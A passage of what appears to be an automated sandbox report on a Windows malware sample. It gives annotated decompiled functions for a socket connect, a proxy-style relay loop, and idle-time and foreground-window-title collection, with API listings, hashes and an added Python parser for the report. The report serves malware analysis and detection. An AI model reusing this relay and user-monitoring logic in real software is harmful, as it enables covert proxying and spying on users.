                                      					} else {
                                      						goto L2;
                                      					}
                                      				}
                                      				return _t33;
                                      			}
                                      
                                      Statement addresses in listing order: 0x0025b4fe, 0x0025b501, 0x0025b502, 0x0025b506, 0x0025b508, 0x0025b50f, 0x0025b515, 0x0025b51c, 0x0025b51f, 0x0025b53f, 0x0025b53f, 0x0025b543, 0x0025b56c, 0x0025b56c, 0x0025b576, 0x0025b57b, 0x0025b57d, 0x0025b581, 0x0025b581, 0x0025b58e, 0x0025b593, 0x0025b595, 0x0025b59d, 0x0025b59d, 0x0025b5a7, 0x0025b5b0, 0x0025b5bc, 0x0025b5d0, 0x0025b5dc, 0x0025b5e2, 0x0025b5ec, 0x0025b5f9, 0x0025b5ff, 0x0025b605, 0x0025b609, 0x0025b60d, 0x0025b612, 0x0025b612, 0x0025b545, 0x0025b54c, 0x0025b55b, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0025b55b, 0x0025b521, 0x0025b52b, 0x0025b53d, 0x0025b55d, 0x0025b55e, 0x0025b566, 0x00000000, 0x00000000, 0x00000000, 0x0025b53d, 0x0025b618

                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0025B50F
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0025B55E
                                        • Part of subcall function 00253222: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00252939,?,?,00000000,exit,00000000,start), ref: 00253247
                                        • Part of subcall function 0025538F: getaddrinfo.WS2_32(?,00000000,00254AC8,00000000), ref: 002553DC
                                        • Part of subcall function 0025538F: socket.WS2_32(00000002,00000001,00000000), ref: 002553F3
                                        • Part of subcall function 0025538F: htons.WS2_32(?), ref: 00255419
                                        • Part of subcall function 0025538F: freeaddrinfo.WS2_32(00000000), ref: 00255429
                                        • Part of subcall function 0025538F: connect.WS2_32(?,?,00000010), ref: 00255435
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0025B5E2
                                      • EnterCriticalSection.KERNEL32(?), ref: 0025B5FF
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0025B609
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                      • String ID:
                                      • API String ID: 4195813003-0
                                      • Opcode ID: 958935bb4ee6d893d26ee9992113204de0ae813d447176d1c4075fa7b2e9bb80
                                      • Instruction ID: e60a567895e541e4c5ba51cbb40e8194bbd8da230b7e11e185e09c564453c77b
                                      • Opcode Fuzzy Hash: 958935bb4ee6d893d26ee9992113204de0ae813d447176d1c4075fa7b2e9bb80
                                      • Instruction Fuzzy Hash: C5318671220502BBD719EB60DC52FAEB79CBF15352F404115FD1A920D2EB74AA2CCF98
                                      Uniqueness

                                      Uniqueness Score: 0.14%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(012E6F6D,00000000,?,?,00000000,00000000,012E6F6D,?,00000000,00000000,012E6F6D,00000001,?,?,00000001,012E6F6D), ref: 012E99E2
                                      • MultiByteToWideChar.KERNEL32(012E6F6D,00000001,?,?,00000000,?), ref: 012E9A57
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012E5CCD), ref: 012E9A69
                                      • __freea.LIBCMT ref: 012E9A72
                                        • Part of subcall function 012E6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,012E852B,00001000,?,?,?,?,012E3843), ref: 012E6F11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                      • String ID:
                                      • API String ID: 573072132-0
                                      • Opcode ID: ab2953d1b1f43f96550d41685f93d704f991733c424c91fb6413bd8629be0c01
                                      • Instruction ID: ca648706137bee7b908ac1b7593ef61a0ef51a4e461d7f523180d6a8aa5bf91e
                                      • Opcode Fuzzy Hash: ab2953d1b1f43f96550d41685f93d704f991733c424c91fb6413bd8629be0c01
                                      • Instruction Fuzzy Hash: A531BE7292021BABDF21DF68DC48DFF7BE9EF44314F44412AEA15A7240D7318991CBA0
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E0025D68F(WCHAR** __ecx, intOrPtr* __edx) {
                                      				struct HRSRC__* _t13;
                                      				void* _t14;
                                      				unsigned int _t32;
                                      				intOrPtr* _t35;            // output structure filled from the resource
                                      				struct HINSTANCE__* _t36;
                                      
                                      				_t35 = __edx;
                                      				// 2 = LOAD_LIBRARY_AS_DATAFILE: the file is mapped for resource access only, its entry point is not run.
                                      				_t36 = LoadLibraryExW( *__ecx, 0, 2);
                                      				if(_t36 == 0xffffffff) {   // LoadLibraryExW returns NULL on failure, so this test never catches a failed load
                                      					L4:
                                      					return 0;
                                      				}
                                      				_t13 = FindResourceW(_t36, 1, 0x10);   // resource name 1, type 0x10 (RT_VERSION)
                                      				if(_t13 == 0) {
                                      					goto L4;
                                      				}
                                      				_t14 = LoadResource(_t36, _t13);
                                      				if(_t14 == 0) {
                                      					goto L4;
                                      				}
                                      				// Copy fields out of the loaded resource into the caller's structure.
                                      				_t32 =  *(_t14 + 0x28);
                                      				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
                                      				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
                                      				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
                                      				 *(_t35 + 8) = _t32 & 1;                    // unpack individual bits of the dword at +0x28
                                      				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
                                      				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
                                      				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
                                      				FreeLibrary(_t36);
                                      				return 1;
                                      			}
                                      
                                      Statement addresses in listing order: 0x0025d698, 0x0025d6a0, 0x0025d6a5, 0x0025d709, 0x00000000, 0x0025d709, 0x0025d6ae, 0x0025d6b6, 0x00000000, 0x00000000, 0x0025d6ba, 0x0025d6c2, 0x00000000, 0x00000000, 0x0025d6c7, 0x0025d6ca, 0x0025d6d0, 0x0025d6dc, 0x0025d6e0, 0x0025d6f5, 0x0025d6f9, 0x0025d6fc, 0x0025d6ff, 0x00000000

                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0025C02B), ref: 0025D69A
                                      • FindResourceW.KERNEL32(00000000,00000001,00000010), ref: 0025D6AE
                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0025C02B), ref: 0025D6BA
                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0025C02B), ref: 0025D6FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadResource$FindFree
                                      • String ID:
                                      • API String ID: 3272429154-0
                                      • Opcode ID: 851a386352c910dbf68a1a4374aca4cafa0aecacd95dcfc7508d4449014b9109
                                      • Instruction ID: e777c131721c427d75e7756ecd25cc73cd21e1109c3fea352c7499c212ce7de6
                                      • Opcode Fuzzy Hash: 851a386352c910dbf68a1a4374aca4cafa0aecacd95dcfc7508d4449014b9109
                                      • Instruction Fuzzy Hash: D701C0B5310A02EFD3188F25AC89A66B7A4FF49311705C239E929C33E0D7B0D865CBA4
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 25%
                                      			E0025D2BD(void* __ecx, void* __edx) {
                                      				signed int _v8;            // bytes pending on the source socket (FIONREAD result)
                                      				char _v2056;               // 0x800-byte relay buffer
                                      				signed int* _t9;
                                      				signed int _t15;
                                      				char* _t16;
                                      				void* _t17;
                                      				void* _t22;
                                      				void* _t23;
                                      
                                      				// One relay step: forward whatever is pending on socket __ecx to socket __edx.
                                      				_v8 = _v8 & 0x00000000;
                                      				_t9 =  &_v8;
                                      				_t23 = __ecx;              // source socket
                                      				_t22 = __edx;              // destination socket
                                      				__imp__#10(__ecx, 0x4004667f, _t9);   // WS2_32 ordinal 10 = ioctlsocket; 0x4004667f = FIONREAD
                                      				if(_t9 == 0xffffffff) {    // SOCKET_ERROR
                                      					L4:
                                      					return 0;
                                      				}
                                      				if(_v8 == 0) {
                                      					Sleep(1);              // nothing to forward yet
                                      					L7:
                                      					return 1;
                                      				}
                                      				E00251052( &_v2056, 0, 0x800);        // zero the buffer (called with memset-style arguments)
                                      				_t15 =  &_v2056;
                                      				__imp__#16(_t23, _t15, 0x800, 0, _t17);   // ordinal 16 = recv(src, buf, 0x800, 0)
                                      				_v8 = _t15;
                                      				if(_t15 == 0) {            // 0 = peer closed the connection
                                      					goto L4;
                                      				}
                                      				_t16 =  &_v2056;
                                      				__imp__#19(_t22, _t16, _t15, 0);      // ordinal 19 = send(dst, buf, received, 0)
                                      				if(_t16 > 0) {
                                      					goto L7;
                                      				}
                                      				goto L4;
                                      			}
                                      
                                      Statement addresses in listing order: 0x0025d2c6, 0x0025d2ca, 0x0025d2d0, 0x0025d2d2, 0x0025d2da, 0x0025d2e3, 0x0025d331, 0x00000000, 0x0025d331, 0x0025d2e9, 0x0025d339, 0x0025d33f, 0x00000000, 0x0025d341, 0x0025d2fb, 0x0025d303, 0x0025d30e, 0x0025d314, 0x0025d31a, 0x00000000, 0x00000000, 0x0025d31f, 0x0025d327, 0x0025d32f, 0x00000000, 0x00000000, 0x00000000

                                      APIs
                                      • ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0025D2DA
                                      • recv.WS2_32(00000000,?,00000800,00000000), ref: 0025D30E
                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 0025D327
                                      • Sleep.KERNEL32(00000001), ref: 0025D339
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Sleepioctlsocketrecvsend
                                      • String ID:
                                      • API String ID: 1168213214-0
                                      • Opcode ID: f3742491aff4569e95a91511fb39cd1d4919c60cb62c5ec7f22b47aac3669b82
                                      • Instruction ID: 98e1e943d682e15abfc9996520c6aa73a3d6c08b6bac61183e522df212a4cc54
                                      • Opcode Fuzzy Hash: f3742491aff4569e95a91511fb39cd1d4919c60cb62c5ec7f22b47aac3669b82
                                      • Instruction Fuzzy Hash: 3E0188B1561515FBE7209B659D49FEE36BCEB44312F1480A1FA45D10C0EBB48E1CCBA5
                                      Uniqueness Score: 7.75%

                                      C-Code - Quality: 82%
                                      			E0025444A(intOrPtr _a4) {
                                      				char _v8;
                                      				struct tagLASTINPUTINFO _v16;
                                      				signed int _v36;
                                      				char _v40;
                                      				short _v552;
                                      
                                      				// Idle time: GetTickCount() - LASTINPUTINFO.dwTime is the number of
                                      				// milliseconds since the last keyboard or mouse input in this session.
                                      				_v16.cbSize = 8;
                                      				GetLastInputInfo( &_v16);
                                      				_t23 = GetTickCount() - _v16.dwTime;
                                      				// Title of the foreground window, up to 0x100 wide characters.
                                      				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
                                      				E00253412( &_v8,  &_v552);		// duplicates the title (lstrlenW/lstrcpyW, see subcalls below)
                                      				_t12 =  &_v36;
                                      				_v36 = _v36 & 0x00000000;
                                      				asm("xorps xmm0, xmm0");
                                      				_v40 = 0x15;				// leading tag of the record built below; its meaning is not shown in this excerpt
                                      				asm("movups [ebp-0x1c], xmm0");
                                      				// Builds a record from the idle time (whole seconds = ms / 0x3e8, plus the ms remainder)
                                      				// and the window title, then hands it on together with _a4 (helper bodies not shown here).
                                      				E002534A6(E0025358E(E0025356D( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
                                      				E00253492( &_v40);
                                      				E00255A2D(_v8);				// frees the title copy (VirtualFree, see subcalls below)
                                      				return _a4;
                                      			}

                                      APIs
                                      • GetLastInputInfo.USER32(?), ref: 0025445F
                                      • GetTickCount.KERNEL32 ref: 00254465
                                      • GetForegroundWindow.USER32 ref: 00254479
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0025448C
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                      • String ID:
                                      • API String ID: 2567647128-0
                                      • Opcode ID: 6372ac9cd25fb4f32bdb4b6933ff297ee0f34e815f107b76389bfbb737552729
                                      • Instruction ID: aae9be66a5b30ff9feefb2f8572cf0f762e661f9aa3cee13b410408bc7eead20
                                      • Opcode Fuzzy Hash: 6372ac9cd25fb4f32bdb4b6933ff297ee0f34e815f107b76389bfbb737552729
                                      • Instruction Fuzzy Hash: 87115E71D10108EBCB04EBA0ED5DADDB7B9EF48301F009165E906B6091EF74AB58CF54
                                      Uniqueness Score: 100.00%
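The two APIs listings above (the ioctlsocket/recv/send relay loop and the GetLastInputInfo/GetWindowTextW collector) are easier to work with once parsed. The Python below is an added example, not code from Joe Sandbox or from the analysed sample: it parses the report's API bullets into call records, orders a function's own calls by call-site address, rebuilds the report's "API ID" token grouping (the stop-word set it uses is an assumption that reproduces every API ID printed on this page; the numeric "API String ID" hash is not reproduced), and maps the well-known WS2_32 export ordinals back to names for imports the decompiler renders as `__imp__#N`. The embedded sample lines are copied from the two listings above.

```python
# Added example, not code from the Joe Sandbox report or from the analysed sample:
# helpers for the report's "APIs" listings and for the decompiler output on this page.
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One "APIs" bullet of the report, e.g.
#   • recv.WS2_32(00000000,?,00000800,00000000), ref: 0025D30E
#   • GetTickCount.KERNEL32 ref: 00254465
#     • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                          # address of the call site
    args: List[str] = field(default_factory=list)
    subcall_of: Optional[int] = None  # callee that makes the call, for "Part of subcall" entries


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse every API bullet of a report excerpt; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16), args, sub))
    return calls


def call_sequence(calls: List[ApiCall]) -> List[ApiCall]:
    """The function's own calls in call-site order (subcall entries dropped)."""
    return sorted((c for c in calls if c.subcall_of is None), key=lambda c: c.ref)


# The report's "API ID" is built from the CamelCase tokens of every listed name
# (subcalls included): tokens grouped by occurrence count, most frequent group
# first, groups joined with '$', tokens within a group in ASCII order.  The
# stop-word set is an assumption; it reproduces every API ID printed on this page.
_TOKEN = re.compile(r"[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*")
_STOP = {"Get", "Set", "Ex", "Id", "For", "A", "W"}


def api_id(calls: List[ApiCall]) -> str:
    counts = Counter(t for c in calls for t in _TOKEN.findall(c.name) if t not in _STOP)
    by_count: Dict[int, List[str]] = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


# Well-known WS2_32.dll export ordinals, for imports the decompiler renders as
# __imp__#N.  The relay listing above confirms #16 = recv (0025D30E) and #19 = send (0025D327).
WS2_32_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 10: "ioctlsocket",
                   13: "listen", 16: "recv", 18: "select", 19: "send", 21: "setsockopt",
                   22: "shutdown", 23: "socket"}


def resolve_ordinals(code: str, table: Dict[int, str] = WS2_32_ORDINALS) -> str:
    """Rewrite __imp__#N( to the exported name where the ordinal is known."""
    def repl(m):
        name = table.get(int(m.group(1)))
        return f"{name}(" if name else m.group(0)
    return re.sub(r"__imp__#(\d+)\(", repl, code)


# Sample input: the two listings above, copied verbatim.
RELAY_APIS = """
• ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0025D2DA
• recv.WS2_32(00000000,?,00000800,00000000), ref: 0025D30E
• send.WS2_32(00000000,?,00000000,00000000), ref: 0025D327
• Sleep.KERNEL32(00000001), ref: 0025D339
"""
IDLE_APIS = """
• GetLastInputInfo.USER32(?), ref: 0025445F
• GetTickCount.KERNEL32 ref: 00254465
• GetForegroundWindow.USER32 ref: 00254479
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0025448C
  • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
  • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
  • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
  • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
"""

if __name__ == "__main__":
    for label, block in (("relay loop", RELAY_APIS), ("idle/title collector", IDLE_APIS)):
        calls = parse_api_block(block)
        print(label, "->", " > ".join(c.name for c in call_sequence(calls)), "| API ID:", api_id(calls))
    print(resolve_ordinals("__imp__#16(_t23, _t15, 0x800, 0, _t17);"))
```

Feeding a whole report through `parse_api_block` and grouping records by the function they belong to gives an API-sequence signature per function that can be compared across samples; `api_id` is the report's own coarse version of that signature, which is why two functions with the same API ID but different instruction hashes are worth a second look.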

                                      C-Code - Quality: 87%
                                      			E0025FC79(CHAR* __ecx, long* __edx) {
                                      				// Reads the whole file named by __ecx into a heap buffer and returns it;
                                      				// the file size is stored to *__edx.
                                      				long _v8;
                                      				long _t6;
                                      				void* _t11;
                                      				long* _t18;
                                      				void* _t22;
                                      
                                      				_push(__ecx);
                                      				_t18 = __edx;
                                      				_t11 = E002510AD(0x400000);		// GetProcessHeap/HeapAlloc of a fixed 4 MiB buffer (see subcalls below)
                                      				_v8 = 0;
                                      				// GENERIC_READ, no sharing, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                                      				_t22 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0);
                                      				_t6 = GetFileSize(_t22, 0);
                                      				 *_t18 = _t6;
                                      				// Neither the handle (INVALID_HANDLE_VALUE) nor the size is checked: ReadFile is
                                      				// asked for the full file size into the fixed 0x400000-byte buffer.
                                      				ReadFile(_t22, _t11, _t6,  &_v8, 0);
                                      				CloseHandle(_t22);
                                      				return _t11;
                                      			}

                                      APIs
                                        • Part of subcall function 002510AD: GetProcessHeap.KERNEL32(00000000,00000000,0025F750,00000800,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 002510B3
                                        • Part of subcall function 002510AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 002510BA
                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0025FCA6
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00252B6F), ref: 0025FCB1
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0025FCC2
                                      • CloseHandle.KERNEL32(00000000), ref: 0025FCC9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: File$Heap$AllocCloseCreateHandleProcessReadSize
                                      • String ID:
                                      • API String ID: 1280141731-0
                                      • Opcode ID: dcdf8357ab2a9b95098a2d9abacda7cb96f6c0917a7ec32b0279d0861310b2d8
                                      • Instruction ID: ae157a48078182ca5722e947787b7fc833391a46a28e9298930cd14890f45de5
                                      • Opcode Fuzzy Hash: dcdf8357ab2a9b95098a2d9abacda7cb96f6c0917a7ec32b0279d0861310b2d8
                                      • Instruction Fuzzy Hash: DCF05EB2611610BFF3145B64AC0DFBB36ACEB55650F104025FA01E21C0EAF05E0986B4
                                      Uniqueness Score: 0.18%

                                      C-Code - Quality: 100%
                                      			E0025CCBA(void* __ecx) {
                                      				// Stops the worker thread owned by the object at __ecx.  Fields used:
                                      				// +0x10 stop event, +0x14 thread handle, +0x18 id of the worker thread.
                                      				void* _t14;
                                      				long _t15;
                                      				void** _t26;
                                      				void* _t27;
                                      
                                      				_t27 = __ecx;
                                      				_t1 = _t27 + 0x14; // 0x266564
                                      				_t26 = _t1;
                                      				if( *_t26 == 0) {
                                      					L6:
                                      					// Release the remaining handle slots (E0025CEBD is a close/reset helper whose
                                      					// body is not in this excerpt) and clear the owner thread id.
                                      					_t5 = _t27 + 0x10; // 0x266560
                                      					E0025CEBD(_t5);
                                      					_t6 = _t27 + 4; // 0x266554
                                      					E0025CEBD(_t6);
                                      					_t7 = _t27 + 0xc; // 0x26655c
                                      					E0025CEBD(_t7);
                                      					_t8 = _t27 + 8; // 0x266558
                                      					_t14 = E0025CEBD(_t8);
                                      					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
                                      					return _t14;
                                      				}
                                      				_t15 = GetCurrentThreadId();
                                      				_t2 = _t27 + 0x18; // 0x0
                                      				if(_t15 ==  *_t2) {
                                      					// Called from the worker thread itself: never wait on or kill the current thread.
                                      					L5:
                                      					E0025CEBD(_t26);
                                      					goto L6;
                                      				}
                                      				if( *(_t27 + 0x10) == 0) {
                                      					return _t15;
                                      				}
                                      				_t4 = _t27 + 0x10; // 0x0
                                      				SetEvent( *_t4);					// ask the worker to stop ...
                                      				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {	// ... give it 5000 ms; 0x102 = WAIT_TIMEOUT
                                      					TerminateThread( *_t26, 0xfffffffe);		// then kill it with exit code -2
                                      				}
                                      				goto L5;
                                      			}

                                      APIs
                                      • GetCurrentThreadId.KERNEL32(?,00000000,0025292E,00000000,exit,00000000,start), ref: 0025CCC6
                                      • SetEvent.KERNEL32(00000000), ref: 0025CCDA
                                      • WaitForSingleObject.KERNEL32(00266564,00001388), ref: 0025CCE7
                                      • TerminateThread.KERNEL32(00266564,000000FE), ref: 0025CCF8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                      • String ID:
                                      • API String ID: 2174867186-0
                                      • Opcode ID: 2e11c9005bbd18f98fef32a10f9cc6dd06bd47105a3393eeb0d01a1cd6da276a
                                      • Instruction ID: 58d2d4d82039e3d4b7e4c55f4ac80dc1e14aed9623083496df6ad03cd2c4df61
                                      • Opcode Fuzzy Hash: 2e11c9005bbd18f98fef32a10f9cc6dd06bd47105a3393eeb0d01a1cd6da276a
                                      • Instruction Fuzzy Hash: 37011231010701DFD734AF14E84A6A977B2AF50313F604A2AE853514E5EB78696CCA44
                                      Uniqueness Score: 10.55%

                                      APIs
                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012EE226
                                      • GetLastError.KERNEL32(?,012EDE49,00000000,00000001,00000000,00000000,?,012EAE2B,00000000,00000000,00000000,00000000,00000000,?,012EB3AA,012ED148), ref: 012EE232
                                        • Part of subcall function 012EE1F8: CloseHandle.KERNEL32(FFFFFFFE), ref: 012EE208
                                      • ___initconout.LIBCMT ref: 012EE242
                                        • Part of subcall function 012EE1BA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 012EE1CD
                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000), ref: 012EE257
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
